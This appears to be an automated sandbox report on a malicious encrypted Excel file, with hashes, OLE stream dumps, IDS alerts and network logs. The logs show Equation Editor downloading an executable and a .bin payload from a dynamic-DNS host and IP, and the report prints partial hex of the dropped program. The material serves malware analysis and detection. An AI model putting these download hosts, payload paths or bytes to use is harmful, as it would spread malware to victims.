                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):61440
                  Entropy (8bit):4.914988096771549
                  Encrypted:false
                  SSDEEP:768:t4cVBi/uynLCBod2XkqAy6dH4ErjAxvWhT5z78gdseDd4kyKz:tO/uB953eg9ylzogB+kl
                  MD5:C05EEE88F0B57E853996957D6523397B
                  SHA1:FC16FA4AB9A88F7E2405EB9A77D168D9C1B7C8D3
                  SHA-256:7E70E44956CDB045FD7B5C66ECA50996900059FD8851AA76BE19A5DD492C6918
                  SHA-512:9441441F5D6D84E4C674E77013CE1BF562173195DE9AC1C05463BCF0BBDA51345B6AF219B279F93E7D2DF84BBFB22D11906B8A145F1FE98EFAF3A28786BE220F
                  Malicious:true
                  Reputation:low
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i......................*..............Rich....................PE..L......P.....................0....................@............................................................................<...........................................................................0...0....................................text...`........................... ..`.data...............................@....rsrc...............................@..@.[#X.......I#...........USER32.DLL.MSVBVM60.DLL.........................................................................................................................................................................................................................................................................................................................................................................................................

                  Static File Info

                  General

                  File type:CDFV2 Encrypted
                  Entropy (8bit):7.996651012349256
                  TrID:
                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                  File name:Unique food order.xlsx
                  File size:2303488
                  MD5:f2cd263042fce1a4c2cbeed5f1676429
                  SHA1:608334d6c55e50f3447f865bca59e05b7b60e0cb
                  SHA256:f2f88e0287d17638c5d902a49d19b2c4e989dc2a511411ce959c91b642fb9359
                  SHA512:847ab0270c6f64d46de8af8039b2092dc7f7978356ff7d5ddb38f7d87c495aa826f4af7d3f4c02547e5e9dd99cd60ca2ee5e5b85b3aa8f2cea3e68ab337ffcca
                  SSDEEP:49152:sZDn4BcTs7rQj4qUoruUVl7/+jfylwvOcvAg0N+MWSmc:NB6mEj4qUojLmjf/vD0N+3Bc
                  File Content Preview:........................>...................$...........................................................................z.......|.......~...............z.......|.......~...............z.......|.......~...............z......................................

                  File Icon

                  Icon Hash:e4e2aa8aa4b4bcb4

                  Static OLE Info

                  General

                  Document Type:OLE
                  Number of OLE Files:1

                  OLE File "Unique food order.xlsx"

                  Indicators

                  Has Summary Info:False
                  Application Name:unknown
                  Encrypted Document:True
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:False
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:
                  Flash Objects Count:
                  Contains VBA Macros:False

                  Streams

                  Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                  General
                  Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                  File Type:data
                  Stream Size:64
                  Entropy:2.73637206947
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                  Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                  Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                  General
                  Stream Path:\x6DataSpaces/DataSpaceMap
                  File Type:data
                  Stream Size:112
                  Entropy:2.7597816111
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                  Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                  Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                  General
                  Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                  File Type:data
                  Stream Size:200
                  Entropy:3.13335930328
                  Base64 Encoded:False
                  Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                  Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                  General
                  Stream Path:\x6DataSpaces/Version
                  File Type:data
                  Stream Size:76
                  Entropy:2.79079600998
                  Base64 Encoded:False
                  Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                  Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                  Stream Path: EncryptedPackage, File Type: data, Stream Size: 2281000
                  General
                  Stream Path:EncryptedPackage
                  File Type:data
                  Stream Size:2281000
                  Entropy:7.99991703704
                  Base64 Encoded:True
                  Data ASCII:. . " . . . . . . . P . . a " . . . . . . . l . 0 d { . [ . . . . . ! { " $ % . . . 3 ^ . s . . . . . . . N . . j . k . - I . . . . . . . . X . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . .
                  Data Raw:1b ce 22 00 00 00 00 00 ed f5 50 da c8 61 22 ee a4 11 a9 b4 92 bd 6c cd 30 64 7b ff 5b f9 81 ec 18 b1 21 7b 22 24 25 91 a0 0b 33 5e dd 73 ff cf d7 ee b7 f6 a4 4e cf 17 6a 1d 6b b2 2d 49 eb bf 97 9d 82 8f 9c 84 58 09 0a f6 ba 02 74 97 93 c6 8f 03 5b 60 aa 39 51 b4 0a f6 ba 02 74 97 93 c6 8f 03 5b 60 aa 39 51 b4 0a f6 ba 02 74 97 93 c6 8f 03 5b 60 aa 39 51 b4 0a f6 ba 02 74 97 93 c6
                  Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                  General
                  Stream Path:EncryptionInfo
                  File Type:data
                  Stream Size:224
                  Entropy:4.51880650455
                  Base64 Encoded:False
                  Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . 9 # . u . @ . W . & . . . . e . " . . . . . h . . V . . . . . . e } . % h . . n . * . . k . % . . M h . u . " 3 - . ? . . . } .
                  Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  11/19/20-07:43:18.523521TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916580192.168.2.22103.125.191.5
                  11/19/20-07:44:36.030811TCP2018752ET TROJAN Generic .bin download from Dotted Quad4916680192.168.2.22103.125.191.5

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Nov 19, 2020 07:43:18.207155943 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:18.522345066 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:18.522639036 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:18.523520947 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:18.839695930 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:18.839757919 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:18.839884996 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:18.839920998 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:18.839926004 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:18.839984894 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:18.839993000 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.155149937 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.155210018 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.155246973 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.155272961 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.155287981 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.155317068 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.155323029 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.155327082 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.155329943 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.155369997 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.155373096 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.155411005 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.155430079 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.155452967 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.155456066 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.155509949 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.470755100 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.470823050 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.470858097 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.470897913 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.470940113 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.470978022 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471029043 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471072912 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.471095085 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471113920 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.471139908 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471174002 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.471195936 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471206903 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.471240997 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471268892 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.471292973 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471302032 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.471338987 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471365929 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.471384048 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.471393108 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471446037 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471466064 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.471503019 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471513033 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.471576929 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.474473000 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.786644936 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.786705971 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.786746025 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.786786079 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.786823988 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.786874056 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.786895037 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.786921024 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.786942959 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.786948919 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.786959887 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.786993980 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.786999941 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787026882 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787041903 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787069082 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787081003 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787089109 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787122965 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787148952 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787162066 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787163019 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787211895 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787221909 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787256956 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787271023 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787297964 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787323952 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787338972 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787354946 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787379980 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787395000 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787410021 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787451029 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787461042 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.789587021 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:20.189624071 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:35.703872919 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:36.028314114 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:36.028513908 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:36.030811071 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:36.356791973 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:36.356851101 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:36.356889963 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:36.356926918 CET8049166103.125.191.5192.168.2.22

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Nov 19, 2020 07:43:18.152446032 CET5219753192.168.2.228.8.8.8
                  Nov 19, 2020 07:43:18.188976049 CET53521978.8.8.8192.168.2.22

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Nov 19, 2020 07:43:18.152446032 CET192.168.2.228.8.8.80xe410Standard query (0)wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.euA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Nov 19, 2020 07:43:18.188976049 CET8.8.8.8192.168.2.220xe410No error (0)wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu103.125.191.5A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
                  • 103.125.191.5

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.2249165103.125.191.580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  TimestampkBytes transferredDirectionData
                  Nov 19, 2020 07:43:18.523520947 CET0OUTGET /worksdoc/svchost.exe HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
                  Connection: Keep-Alive
                  Nov 19, 2020 07:43:18.839695930 CET2INHTTP/1.1 200 OK
                  Date: Thu, 19 Nov 2020 06:43:17 GMT
                  Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                  Last-Modified: Wed, 18 Nov 2020 21:48:32 GMT
                  ETag: "f000-5b4689298b6b3"
                  Accept-Ranges: bytes
                  Content-Length: 61440
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: application/x-msdownload
                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 69 c6 c2 93 08 a8 91 93 08 a8 91 93 08 a8 91 10 14 a6 91 92 08 a8 91 dc 2a a1 91 9b 08 a8 91 a5 2e a5 91 92 08 a8 91 52 69 63 68 93 08 a8 91 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8a a6 b8 50 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 c0 00 00 00 30 00 00 00 00 00 00 18 12 00 00 00 10 00 00 00 d0 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 01 00 00 10 00 00 e9 b7 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 c3 00 00 3c 00 00 00 00 f0 00 00 f8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 30 00 00 00 00 10 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 b6 00 00 00 10 00 00 00 c0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 13 00 00 00 d0 00 00 00 10 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 08 00 00 00 f0 00 00 00 10 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 ee 5b 23 58 18 00 00 00 c3 1f b0 49 23 00 00 00 00 00 00 00 00 00 00 00 55 53 45 52 33 32 2e 44 4c 4c 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$i*.RichPELP0@<00.text` `.data@.rsrc@@[#XI#USER32.DLLMSVBVM60.DLL


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.2249166103.125.191.580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  TimestampkBytes transferredDirectionData
                  Nov 19, 2020 07:44:36.030811071 CET66OUTGET /bin_xMjelaYnr43.bin HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: 103.125.191.5
                  Cache-Control: no-cache
                  Nov 19, 2020 07:44:36.356791973 CET67INHTTP/1.1 200 OK
                  Date: Thu, 19 Nov 2020 06:44:35 GMT
                  Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                  Last-Modified: Wed, 18 Nov 2020 21:20:27 GMT
                  ETag: "2d640-5b4682e21b662"
                  Accept-Ranges: bytes
                  Content-Length: 185920
                  Content-Type: application/octet-stream
                  Data Raw: c0 4c c3 db cd c5 93 5d 55 14 39 b6 3e 24 13 09 bd 46 7f a3 38 d8 f5 8c 62 41 6f 79 33 d1 c3 6e 24 67 7f be 71 ac 91 32 8e a6 51 82 fb 00 c1 d3 18 14 ac 84 80 9b 97 89 ea 59 7b ab 1c fa b4 72 2c 81 92 87 0a 86 9b f1 e4 60 41 0f ba e3 88 b0 31 87 78 80 d1 c2 4b 58 e6 7e 0a 2f c2 89 af 4c 45 22 b7 b4 a3 90 3b 8f c8 35 eb 5b 59 ae 80 25 67 8a 69 1a 7d e9 5c 2c 34 91 9f d4 99 bf 3a 3d 90 ea 69 a3 02 a5 ec d4 54 93 61 e7 99 3e 6a 28 09 e2 bf b1 11 7c 2a e8 0f d2 66 3d f5 e1 cb a7 e1 1c 31 56 c2 72 72 9e e3 c4 a1 6a c0 e3 30 fa e7 f2 ca 24 ff a7 55 a4 4f 33 01 64 7f 01 ec 28 a6 29 5f 7c 26 dd 8a 41 7c 37 9e 8a 1b c5 98 14 0e 18 7e d5 02 a4 e3 0d 9e e4 ae 42 19 16 6b ed 05 06 39 95 07 40 ec a0 c0 13 c8 1b 2e 54 80 5c 88 94 a6 ff 92 8e 21 0c 19 87 b0 a3 64 29 6d e0 4a 11 d0 c3 d0 d8 36 07 d7 4b f1 a6 7e da a4 16 72 74 b9 e2 f1 30 0b ff 67 72 41 3f 0c e0 b9 d3 c0 6c d6 a5 6a ee e1 99 b7 af 45 55 6a 38 6b f8 4c 53 45 df 8c c5 b4 51 38 56 e8 29 78 f6 27 05 4d 08 a2 d1 1e 24 4a 3f 54 e7 1f a5 bd ff 23 4d de 9b d4 48 98 e3 38 e7 8d 8f 2b c0 a3 dd 39 d7 2f 5d cd d5 93 5f 5b 31 5e b9 3d 02 84 a3 d2 47 05 b9 ba 54 b3 e3 64 dc c9 5c 66 2a 93 d0 b1 70 da 29 d0 65 5f 1c ed ec 81 c6 17 43 00 91 d7 08 98 cd 2d 50 a1 05 53 dd 30 3a e2 4b c0 d0 e7 64 e2 59 4d c8 fa 0e 96 86 f2 9c b3 28 59 1c 76 de c9 bb 54 7e a7 2a 14 87 05 2f eb cc 33 75 64 1a fd e8 e7 a3 4a 0f 8e c6 60 ce e5 b2 95 8c ba 53 39 bf 74 c2 0f 71 90 27 b5 75 bb 1b 12 91 78 d9 85 00 58 ef d6 f4 d5 f9 87 dc 4f 01 42 41 93 45 e9 a7 c9 b3 bf 6c 26 6f b7 51 8b 1b 40 3b 27 08 67 28 15 76 1b 99 02 a2 49 c3 42 4e 83 36 7a c7 f8 ae 35 e9 ce 98 5e 54 33 fc 71 2e cc 8c 40 9b de a5 8a 77 7c 75 60 43 10 81 de bd 93 56 68 9c d7 70 c0 c9 92 7e a3 09 77 de 8a eb c6 d0 15 ae 89 64 71 ef c2 4f d9 a4 61 fd 86 9e 30 d2 59 90 47 3c 65 50 33 b3 1f 16 a5 9b 6d 75 1b 18 fe dd 91 da 35 a5 cc 78 ad a4 63 87 84 26 5c 61 22 38 f1 4b 07 da c2 b9 c0 64 aa 66 53 7f 19 78 45 d4 9a 97 a9 3e a4 5b ac bf d5 ce 32 85 4a 24 a1 55 e7 62 8e ef b2 ca 8c f9 b4 14 10 f5 77 0d 09 a5 d8 b2 61 3d 6d 0d b6 df d7 38 b8 da 38 ba 76 17 20 fc 00 01 89 6e 54 0f 4c 65 12 0b 8b c6 a9 e7 ec cd b8 27 90 a9 57 ee 85 e6 9d e1 36 fb d4 02 87 9f c9 28 c3 dc 13 2c d0 57 64 9f ac e5 ad b6 d2 9d bd 36 57 91 62 3f 90 fe 91 01 ce ab f9 88 77 d0 64 99 be 90 82 ca d7 69 05 c6 05 ea 51 3d 4a b1 07 f4 87 4c 9a c1 e8 f0 5c b0 11 2b 76 fd 38 c2 b4 87 42 ca e5 2e 53 47 cc cf be fc 1d 0b 1d b0 d2 52 d3 75 41 2b a8 9b 9c 6c bd 7d 98 fa 69 cc 11 82 0e 67 1d f7 d2 27 fb 8e 81 2d 41 88 d3 d2 8b db 2c 20 38 7e 2c e8 8a f4 93 cb fc 12 bd fe b6 ea f4 be c0 fd 71 c7 44 ff 59 e8 63 5e 4b f9 e2 4e 5b aa 62 e5 03 f2 71 ff 2e e5 92 49 4d fa 26 bd 06 83 65 3e 1c 68 0c b8 39 b2 5a a2 58 3a 58 f6 a2 83 e7 f0 54 a7 49 eb 7b 34 85 16 fe 7f c1 2d cd d7 be 1a cd d7 ad 02 cb 61 db d7 d5 e2 86 9b f1 e4 38 c2 e7 b3 68 40 33 f1 bb f3 80 d2 03 c8 98 ce 7d 02 d0 23 19 af 4c 